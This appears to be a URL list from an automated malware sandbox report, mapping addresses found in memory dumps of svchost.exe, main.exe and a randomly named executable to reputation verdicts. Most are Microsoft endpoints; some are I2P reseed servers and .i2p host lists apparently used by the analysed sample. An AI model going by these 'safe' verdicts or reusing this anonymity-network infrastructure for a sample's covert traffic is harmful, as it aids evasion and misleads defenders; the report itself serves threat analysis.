    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAsvchost.exe, 00000028.00000003.2051472128.000002986490E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2225074479.000002986490E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2191388521.000002986490E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2050882822.000002986490E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2054077137.000002986490E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2054436645.000002986490E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2054374509.000002986490E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2225637609.000002986490E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2191695583.000002986490F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2225290392.000002986490F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2192265988.000002986490E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2053957702.000002986490F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2527937439.0000029864900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2191499844.000002986490F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2224850593.0000029864907000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2054022632.000002986490E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2191764692.000002986490F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2191080698.000002986490E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2169625242.000002986490E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2204570380.0000029864907000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2054546359.000002986490E000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 00000000.00000003.1364488310.000001A7F5062000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1364716029.000001A7F505A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1366032313.000001A7F5081000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365876947.000001A7F5063000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1364541563.000001A7F505F000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issuesvchost.exe, 00000028.00000003.2225363797.000002986496D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2236542045.000002986496E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2528233861.000002986495F000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 00000000.00000002.1365723954.000001A7F5042000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1364769439.000001A7F5041000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAAsvchost.exe, 00000028.00000003.2190886218.0000029864929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2225341192.0000029864979000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://login.microsoftonline.com/ppsecure/devicechangecredential.srfsvchost.exe, 00000028.00000002.2526898399.0000029864045000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf.svchost.exe, 00000028.00000002.2526898399.0000029864045000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://login.microsoftonline.com/ppsecure/EnumerateDevices.srfsvchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989259240.0000029864940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526898399.0000029864045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989213625.000002986493B000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://account.live.com/InlineSignup.aspx?iww=1&id=80502svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989259240.0000029864940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526898399.0000029864045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989213625.000002986493B000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdesAAAAsvchost.exe, 00000028.00000003.2225341192.0000029864979000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://banana.incognet.io/main.exe, 00000029.00000002.2528754555.000001FE46EDD000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000029.00000002.2530936773.00007FFB0C164000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.18.drtrue
    • Avira URL Cloud: safe
    unknown
    http://www.bingmapsportal.comsvchost.exe, 00000000.00000002.1365593351.000001A7F5013000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000000.00000003.1364488310.000001A7F5062000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1364716029.000001A7F505A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365876947.000001A7F5063000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365694389.000001A7F503F000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://t0.ssl.ak.dynamic.tiles.virtsvchost.exe, 00000000.00000003.1364826173.000001A7F5030000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://Passport.NET/tb_svchost.exe, 00000028.00000002.2529560921.0000029864EA3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526962025.000002986405F000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txtupdate.pkg.18.drfalse
    • Avira URL Cloud: safe
    unknown
    https://t0.ssl.ak0svchost.exe, 00000000.00000003.1364826173.000001A7F5030000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://reseed-fr.i2pd.xyz/main.exe, 00000029.00000002.2528754555.000001FE46EDD000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000029.00000002.2530936773.00007FFB0C164000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.18.drtrue
    • Avira URL Cloud: safe
    unknown
    https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 00000000.00000003.1364623479.000001A7F505D000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 00000000.00000002.1365909778.000001A7F5068000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1364470645.000001A7F5067000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365624998.000001A7F502B000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://i2p.novg.net/main.exe, 00000029.00000002.2528754555.000001FE46EDD000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000029.00000002.2530936773.00007FFB0C164000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.18.drtrue
    • Avira URL Cloud: safe
    unknown
    https://login.microsoftonline.com/ppsecure/DeviceAssociate.srfJsvchost.exe, 00000028.00000002.2526898399.0000029864045000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://account.live.com/msangcwamsvchost.exe, 00000028.00000003.1989259240.0000029864940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526898399.0000029864045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989239979.0000029864957000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1988983984.0000029864929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989069790.0000029864952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989213625.000002986493B000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=svchost.exe, 00000000.00000002.1365723954.000001A7F5042000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1364769439.000001A7F5041000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1364541563.000001A7F505F000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://i2p.ghativega.in/main.exe, 00000029.00000002.2528754555.000001FE46EDD000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000029.00000002.2530936773.00007FFB0C164000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.18.drtrue
    • Avira URL Cloud: safe
    unknown
    http://passport.net/tbsvchost.exe, 00000028.00000002.2527468407.00000298640EA000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt/main.exe, 0000001D.00000002.2206042707.0000027B4440D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000029.00000002.2528754555.000001FE46EDD000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://www2.mk16.de/main.exe, 00000029.00000002.2528754555.000001FE46EDD000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000029.00000002.2530936773.00007FFB0C164000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.18.drtrue
    • Avira URL Cloud: safe
    unknown
    https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 00000000.00000003.1364826173.000001A7F5030000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://reg.i2p/hosts.txtupdate.pkg.18.drfalse
    • Avira URL Cloud: safe
    unknown
    https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 00000000.00000003.1364800433.000001A7F5057000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365782760.000001A7F5058000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://t0.ssl.ak.dynamic.tiles.virtualearth.svchost.exe, 00000000.00000003.1364826173.000001A7F5030000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/svchost.exe, 00000000.00000003.1364800433.000001A7F5057000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365782760.000001A7F5058000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://t0.ssl.ak.dynamic.tiles.virtuxAsvchost.exe, 00000000.00000002.1365663996.000001A7F5034000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1364826173.000001A7F5030000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://identiguy.i2p/hosts.txtyhar2he6rpt6n0h1w6rh.exe, 00000012.00000002.1546713788.00007FF70C31E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 0000001D.00000002.2203168945.0000027B43FE4000.00000004.00000020.00020000.00000000.sdmp, update.pkg.18.drfalse
    • Avira URL Cloud: safe
    unknown
    https://dynamic.tsvchost.exe, 00000000.00000003.1364293809.000001A7F5086000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://reseed.diva.exchange/main.exe, 00000029.00000002.2528754555.000001FE46EDD000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000029.00000002.2530936773.00007FFB0C164000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.18.drtrue
    • Avira URL Cloud: safe
    unknown
    https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 00000000.00000003.1364800433.000001A7F5057000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365782760.000001A7F5058000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issuesvchost.exe, 00000028.00000003.2225363797.000002986496D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2527366735.00000298640B3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2236542045.000002986496E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2528233861.000002986495F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2169550030.000002986496E000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://i2pd.readthedocs.io/en/latest/user-guide/configuration/yhar2he6rpt6n0h1w6rh.exe, 00000012.00000002.1546713788.00007FF70C31E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 0000001D.00000002.2203168945.0000027B43FE4000.00000004.00000020.00020000.00000000.sdmp, update.pkg.18.drfalse
    • Avira URL Cloud: safe
    unknown
    http://schemas.xmlsoap.org/ws/2005/02/trust/Issueesvchost.exe, 00000028.00000003.2236542045.000002986496E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2528233861.000002986495F000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://reseed.stormycloud.org/main.exe, 00000029.00000002.2528754555.000001FE46EDD000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000029.00000002.2530936773.00007FFB0C164000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.18.drtrue
    • Avira URL Cloud: safe
    unknown
    https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 00000000.00000003.1364488310.000001A7F5062000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365876947.000001A7F5063000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://login.ecursvchost.exe, 00000028.00000002.2526898399.0000029864045000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 00000000.00000002.1366032313.000001A7F5081000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 00000000.00000003.1364743733.000001A7F5049000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1364488310.000001A7F5062000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365876947.000001A7F5063000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://reg.i2p/hosts.txtcmain.exe, 0000001D.00000002.2206042707.0000027B4440D000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdmlns:svchost.exe, 00000028.00000003.2003614074.0000029864952000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 00000000.00000003.1364800433.000001A7F5057000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365782760.000001A7F5058000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 00000000.00000003.1364769439.000001A7F5041000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfsvchost.exe, 00000028.00000002.2526898399.0000029864045000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://reseed.stormycloud.org/omain.exe, 0000001D.00000002.2206042707.0000027B4440D000.00000004.00000020.00020000.00000000.sdmptrue
    • Avira URL Cloud: safe
    unknown
    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAsvchost.exe, 00000028.00000003.2190886218.0000029864929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2528233861.000002986495F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2225341192.0000029864979000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://login.livcosvchost.exe, 00000028.00000002.2526801542.000002986402B000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://login.microsoftonline.com/ppsecure/DeviceQuery.srfsvchost.exe, 00000028.00000003.1989259240.0000029864940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989213625.000002986493B000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://reseed.stormycloud.org/rmain.exe, 0000001D.00000002.2206042707.0000027B4440D000.00000004.00000020.00020000.00000000.sdmptrue
    • Avira URL Cloud: safe
    unknown
    http://schemas.xmlsoap.org/soap/envelope/svchost.exe, 00000028.00000003.2051472128.000002986490E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2050882822.000002986490E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2054077137.000002986490E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2053957702.000002986490F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2054022632.000002986490E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2528233861.000002986495F000.00000004.00000020.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    http://schemas.xmlsoap.org/ws/2005/02/trustsvchost.exe, 00000028.00000002.2528003910.0000029864913000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2191080698.000002986490E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2528233861.000002986495F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2169625242.000002986490E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2225212612.000002986490F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2169664337.000002986490E000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://reseed.i2pgit.org/main.exe, 00000029.00000002.2528754555.000001FE46EDD000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000029.00000002.2530936773.00007FFB0C164000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.18.drtrue
    • Avira URL Cloud: safe
    unknown
    http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txti2p.su3main.exe, 00000029.00000002.2528754555.000001FE46EDD000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://login.microsoftonline.com/MSARST2.srfsvchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989259240.0000029864940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526962025.000002986405F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989213625.000002986493B000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://Passport.NET/STSsvchost.exe, 00000028.00000002.2528233861.000002986495F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2528121324.0000029864937000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 00000000.00000003.1364800433.000001A7F5057000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365782760.000001A7F5058000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://reseed-pl.i2pd.xyz/main.exe, 00000029.00000002.2528754555.000001FE46EDD000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000029.00000002.2530936773.00007FFB0C164000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.18.drtrue
    • Avira URL Cloud: safe
    unknown
    https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 00000000.00000002.1365624998.000001A7F502B000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://stats.i2p/cgi-bin/newhosts.txtyhar2he6rpt6n0h1w6rh.exe, 00000012.00000002.1546713788.00007FF70C31E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 0000001D.00000002.2203168945.0000027B43FE4000.00000004.00000020.00020000.00000000.sdmp, update.pkg.18.drfalse
    • Avira URL Cloud: safe
    unknown
    https://login.microsoftonline.com/ppsecure/DeviceQuery.srf-svchost.exe, 00000028.00000002.2526898399.0000029864045000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf%svchost.exe, 00000028.00000002.2526898399.0000029864045000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://127.0.0.1:8118yhar2he6rpt6n0h1w6rh.exe, 00000012.00000002.1546713788.00007FF70C31E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 0000001D.00000002.2203168945.0000027B43FE4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000029.00000003.2310786980.000001FE46F13000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000029.00000003.2310853931.000001FE46F18000.00000004.00000020.00020000.00000000.sdmp, update.pkg.18.drfalse
    • Avira URL Cloud: safe
    unknown
    https://reseed.stormycloud.org/Wmain.exe, 00000029.00000002.2528754555.000001FE46EDD000.00000004.00000020.00020000.00000000.sdmptrue
    • Avira URL Cloud: safe
    unknown
    http://docs.oasis-open.org/wss/28svchost.exe, 00000028.00000002.2528233861.000002986495F000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAAAsvchost.exe, 00000028.00000002.2528233861.000002986495F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2225341192.0000029864979000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://reseed.onion.im/main.exe, 00000029.00000002.2528754555.000001FE46EDD000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000029.00000002.2530936773.00007FFB0C164000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.18.drtrue
    • Avira URL Cloud: safe
    unknown
    https://i2p.mooo.com/netDb/yhar2he6rpt6n0h1w6rh.exe, 00000012.00000002.1546713788.00007FF70C31E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 0000001D.00000002.2203168945.0000027B43FE4000.00000004.00000020.00020000.00000000.sdmp, update.pkg.18.drfalse
    • Avira URL Cloud: safe
    unknown
    https://reseed2.i2p.net/main.exe, 00000029.00000002.2528754555.000001FE46EDD000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000029.00000002.2530936773.00007FFB0C164000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.18.drtrue
    • Avira URL Cloud: safe
    unknown
    http://Passport.NET/tbsvchost.exe, 00000028.00000002.2528684973.0000029864E39000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2192487068.0000029864E89000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2528358277.0000029864983000.00000004.00000020.00020000.00000000.sdmpfalse
      unknown
      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsvchost.exe, 00000028.00000003.2191080698.000002986490E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2528233861.000002986495F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2050807188.0000029864907000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2050828700.000002986490E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2225212612.000002986490F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2169664337.000002986490E000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsdsvchost.exe, 00000028.00000003.2225363797.000002986496D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2236542045.000002986496E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2528233861.000002986495F000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://login.microsoftonline.com/ppsecure/devicechangecredential.srfMMsvchost.exe, 00000028.00000003.1989355515.0000029864927000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://reseed.stormycloud.org/cmain.exe, 0000001D.00000002.2206042707.0000027B4440D000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      unknown
      https://signup.live.com/signup.aspxsvchost.exe, 00000028.00000003.1989213625.000002986493B000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000000.00000002.1365909778.000001A7F5068000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1364470645.000001A7F5067000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365624998.000001A7F502B000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80601svchost.exe, 00000028.00000003.1988983984.0000029864929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989763777.0000029864956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989069790.0000029864952000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 00000000.00000003.1364800433.000001A7F5057000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365782760.000001A7F5058000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80600svchost.exe, 00000028.00000003.1988983984.0000029864929000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80603svchost.exe, 00000028.00000003.1988983984.0000029864929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989069790.0000029864952000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://schemas.xmlsoap.org/ws/2004/09/policysvchost.exe, 00000028.00000003.2225363797.000002986496D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2236542045.000002986496E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2528003910.0000029864913000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2191080698.000002986490E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2528233861.000002986495F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2225212612.000002986490F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2169550030.000002986496E000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymoussvchost.exe, 00000028.00000002.2528121324.0000029864937000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
